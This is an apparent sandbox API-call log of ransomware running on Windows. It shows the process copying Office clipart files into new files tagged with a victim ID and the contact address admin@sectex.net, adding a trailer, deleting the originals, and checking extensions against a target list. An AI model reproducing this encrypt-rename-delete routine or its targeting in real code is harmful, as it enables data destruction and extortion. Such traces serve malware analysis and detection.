	[0140.484] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 63
	[0140.484] lstrlenW (lpString=".jpg") returned 4
	[0140.484] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.484] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0140.484] lstrlenW (lpString="BD09031_.WMF") returned 12
	[0140.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0140.485] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=47786) returned 1
	[0140.485] CloseHandle (hObject=0x398) returned 1
	[0140.613] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf")) returned 0x20
	[0140.634] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.650] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.650] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0140.681] GetLastError () returned 0x0
	[0140.681] ReadFile (in: hFile=0x3a0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xbaaa, lpOverlapped=0x0) returned 1
	[0140.685] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xbab0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xbab0, lpOverlapped=0x0) returned 1
	[0140.686] ReadFile (in: hFile=0x3a0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.686] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.686] SetEndOfFile (hFile=0x3ac) returned 1
	[0140.686] CloseHandle (hObject=0x3ac) returned 1
	[0140.686] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.687] SetEndOfFile (hFile=0x3a0) returned 1
	[0140.690] CloseHandle (hObject=0x3a0) returned 1
	[0140.690] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.753] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf")) returned 1
	[0140.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63
	[0140.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63
	[0140.764] lstrlenW (lpString=".doc") returned 4
	[0140.764] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.764] lstrlenW (lpString=".docx") returned 5
	[0140.764] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.764] lstrlenW (lpString=".pdf") returned 4
	[0140.764] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.764] lstrlenW (lpString=".xls") returned 4
	[0140.764] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.764] lstrlenW (lpString=".xlsx") returned 5
	[0140.764] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.764] lstrlenW (lpString=".ppt") returned 4
	[0140.764] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63
	[0140.764] lstrlenW (lpString=".zip") returned 4
	[0140.764] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.764] lstrlenW (lpString=".rar") returned 4
	[0140.764] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.765] lstrlenW (lpString=".bz2") returned 4
	[0140.765] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.765] lstrlenW (lpString=".7z") returned 3
	[0140.765] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63
	[0140.765] lstrlenW (lpString=".dbf") returned 4
	[0140.765] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63
	[0140.765] lstrlenW (lpString=".1cd") returned 4
	[0140.765] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63
	[0140.765] lstrlenW (lpString=".jpg") returned 4
	[0140.765] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63
	[0140.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63
	[0140.765] lstrlenW (lpString=".doc") returned 4
	[0140.765] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.765] lstrlenW (lpString=".docx") returned 5
	[0140.765] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.765] lstrlenW (lpString=".pdf") returned 4
	[0140.765] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.765] lstrlenW (lpString=".xls") returned 4
	[0140.765] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.765] lstrlenW (lpString=".xlsx") returned 5
	[0140.765] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.765] lstrlenW (lpString=".ppt") returned 4
	[0140.765] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63
	[0140.765] lstrlenW (lpString=".zip") returned 4
	[0140.765] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.765] lstrlenW (lpString=".rar") returned 4
	[0140.765] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.765] lstrlenW (lpString=".bz2") returned 4
	[0140.766] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.766] lstrlenW (lpString=".7z") returned 3
	[0140.766] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63
	[0140.766] lstrlenW (lpString=".dbf") returned 4
	[0140.766] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63
	[0140.766] lstrlenW (lpString=".1cd") returned 4
	[0140.766] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 63
	[0140.766] lstrlenW (lpString=".jpg") returned 4
	[0140.766] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.766] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0140.766] lstrlenW (lpString="BD10890_.GIF") returned 12
	[0140.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.790] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=13515) returned 1
	[0140.790] CloseHandle (hObject=0x31c) returned 1
	[0140.791] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif")) returned 0x20
	[0140.829] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0140.978] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.979] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0140.979] GetLastError () returned 0x0
	[0140.979] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x34cb, lpOverlapped=0x0) returned 1
	[0140.993] WriteFile (in: hFile=0x3bc, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x34d0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x34d0, lpOverlapped=0x0) returned 1
	[0140.994] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.994] WriteFile (in: hFile=0x3bc, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.994] SetEndOfFile (hFile=0x3bc) returned 1
	[0141.001] CloseHandle (hObject=0x3bc) returned 1
	[0141.181] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.181] SetEndOfFile (hFile=0x31c) returned 1
	[0141.183] CloseHandle (hObject=0x31c) returned 1
	[0141.184] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.243] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif")) returned 1
	[0141.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63
	[0141.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63
	[0141.245] lstrlenW (lpString=".doc") returned 4
	[0141.245] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0141.245] lstrlenW (lpString=".docx") returned 5
	[0141.245] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0141.245] lstrlenW (lpString=".pdf") returned 4
	[0141.245] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0141.245] lstrlenW (lpString=".xls") returned 4
	[0141.245] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0141.245] lstrlenW (lpString=".xlsx") returned 5
	[0141.245] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0141.245] lstrlenW (lpString=".ppt") returned 4
	[0141.245] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0141.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63
	[0141.245] lstrlenW (lpString=".zip") returned 4
	[0141.245] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0141.245] lstrlenW (lpString=".rar") returned 4
	[0141.245] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0141.245] lstrlenW (lpString=".bz2") returned 4
	[0141.245] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0141.245] lstrlenW (lpString=".7z") returned 3
	[0141.245] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0141.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63
	[0141.245] lstrlenW (lpString=".dbf") returned 4
	[0141.245] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0141.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63
	[0141.245] lstrlenW (lpString=".1cd") returned 4
	[0141.245] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0141.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63
	[0141.245] lstrlenW (lpString=".jpg") returned 4
	[0141.245] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0141.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63
	[0141.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63
	[0141.246] lstrlenW (lpString=".doc") returned 4
	[0141.246] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0141.246] lstrlenW (lpString=".docx") returned 5
	[0141.246] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0141.246] lstrlenW (lpString=".pdf") returned 4
	[0141.246] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0141.246] lstrlenW (lpString=".xls") returned 4
	[0141.246] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0141.246] lstrlenW (lpString=".xlsx") returned 5
	[0141.246] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0141.246] lstrlenW (lpString=".ppt") returned 4
	[0141.246] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0141.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63
	[0141.246] lstrlenW (lpString=".zip") returned 4
	[0141.246] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0141.246] lstrlenW (lpString=".rar") returned 4
	[0141.246] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0141.246] lstrlenW (lpString=".bz2") returned 4
	[0141.246] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0141.246] lstrlenW (lpString=".7z") returned 3
	[0141.246] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0141.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63
	[0141.246] lstrlenW (lpString=".dbf") returned 4
	[0141.246] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0141.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63
	[0141.246] lstrlenW (lpString=".1cd") returned 4
	[0141.246] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0141.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63
	[0141.246] lstrlenW (lpString=".jpg") returned 4
	[0141.246] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0141.247] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.247] lstrlenW (lpString="BL00098_.WMF") returned 12
	[0141.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0141.247] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1012) returned 1
	[0141.247] CloseHandle (hObject=0x3a4) returned 1
	[0141.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf")) returned 0x20
	[0141.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0141.248] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.248] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.248] GetLastError () returned 0x0
	[0141.248] ReadFile (in: hFile=0x3a4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x3f4, lpOverlapped=0x0) returned 1
	[0141.251] WriteFile (in: hFile=0x384, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x400, lpOverlapped=0x0) returned 1
	[0141.252] ReadFile (in: hFile=0x3a4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.252] WriteFile (in: hFile=0x384, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.252] SetEndOfFile (hFile=0x384) returned 1
	[0141.253] CloseHandle (hObject=0x384) returned 1
	[0141.253] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.253] SetEndOfFile (hFile=0x3a4) returned 1
	[0141.259] CloseHandle (hObject=0x3a4) returned 1
	[0141.260] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.338] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf")) returned 1
	[0141.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63
	[0141.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63
	[0141.400] lstrlenW (lpString=".doc") returned 4
	[0141.400] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.400] lstrlenW (lpString=".docx") returned 5
	[0141.400] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.400] lstrlenW (lpString=".pdf") returned 4
	[0141.400] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.400] lstrlenW (lpString=".xls") returned 4
	[0141.400] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.400] lstrlenW (lpString=".xlsx") returned 5
	[0141.400] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.400] lstrlenW (lpString=".ppt") returned 4
	[0141.400] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63
	[0141.400] lstrlenW (lpString=".zip") returned 4
	[0141.400] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.400] lstrlenW (lpString=".rar") returned 4
	[0141.400] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.400] lstrlenW (lpString=".bz2") returned 4
	[0141.400] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.400] lstrlenW (lpString=".7z") returned 3
	[0141.400] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63
	[0141.400] lstrlenW (lpString=".dbf") returned 4
	[0141.400] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63
	[0141.400] lstrlenW (lpString=".1cd") returned 4
	[0141.400] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63
	[0141.401] lstrlenW (lpString=".jpg") returned 4
	[0141.401] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63
	[0141.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63
	[0141.401] lstrlenW (lpString=".doc") returned 4
	[0141.401] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.401] lstrlenW (lpString=".docx") returned 5
	[0141.401] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.401] lstrlenW (lpString=".pdf") returned 4
	[0141.401] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.401] lstrlenW (lpString=".xls") returned 4
	[0141.401] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.401] lstrlenW (lpString=".xlsx") returned 5
	[0141.401] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.401] lstrlenW (lpString=".ppt") returned 4
	[0141.401] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63
	[0141.401] lstrlenW (lpString=".zip") returned 4
	[0141.401] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.401] lstrlenW (lpString=".rar") returned 4
	[0141.401] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.401] lstrlenW (lpString=".bz2") returned 4
	[0141.401] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.401] lstrlenW (lpString=".7z") returned 3
	[0141.401] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63
	[0141.401] lstrlenW (lpString=".dbf") returned 4
	[0141.401] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63
	[0141.401] lstrlenW (lpString=".1cd") returned 4
	[0141.401] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 63
	[0141.401] lstrlenW (lpString=".jpg") returned 4
	[0141.402] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
